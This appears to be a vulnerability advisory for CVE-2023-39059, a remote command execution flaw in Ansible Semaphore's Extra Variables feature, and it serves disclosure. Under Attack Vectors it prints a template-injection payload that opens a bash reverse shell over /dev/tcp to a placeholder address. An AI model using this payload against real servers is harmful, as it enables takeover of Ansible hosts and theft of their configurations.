Headline
CVE-2023-39059: CVE-2023-39059
An issue in ansible semaphore v.2.8.90 allows a remote attacker to execute arbitrary code via a crafted payload to the extra variables parameter.
---------------------------------------------------------------
[VulnerabilityType Other]
Remote Command Execution (RCE)
---------------------------------------------------------------
[Affected Component]
Ansible Semaphore includes a feature called “Extra Variables.” This feature can be accessed at https://<semaphore-endpoint>/project/id/environment and is directly associated with the ansible-playbook --extra-vars flag.
---------------------------------------------------------------
[Attack Type]
Remote
---------------------------------------------------------------
[Impact Code execution]
true
---------------------------------------------------------------
[Impact Denial of Service]
true
---------------------------------------------------------------
[Impact Escalation of Privileges]
true
---------------------------------------------------------------
[Impact Information Disclosure]
true
---------------------------------------------------------------
[Attack Vectors]
The --extra-vars parameter can be abused by a malicious user with low privileges to achieve Remote Command Execution (RCE) and read files and configurations, perform Server Side Request Forgery (SSRF), execute commands, and establish a reverse shell on the ansible server. Payload:
{"ansible_user": “{{ lookup('ansible.builtin.pipe’, \"bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/1337 <&1’\”) }}"}
---------------------------------------------------------------
[Has vendor confirmed]
true
---------------------------------------------------------------
[Discoverer]
@alevsk
---------------------------------------------------------------
[Reference]
https://www.alevsk.com/2023/07/a-quick-story-of-security-pitfalls-with-execcommand-in-software-integrations/
---------------------------------------------------------------
[Vendor of Product]
ansible semaphore
---------------------------------------------------------------
[Affected Product Code Base]
ansible semaphore v2.8.90
---------------------------------------------------------------
Related news
An issue in ansible semaphore v.2.8.90 allows a remote attacker to execute arbitrary code via a crafted payload to the extra variables parameter.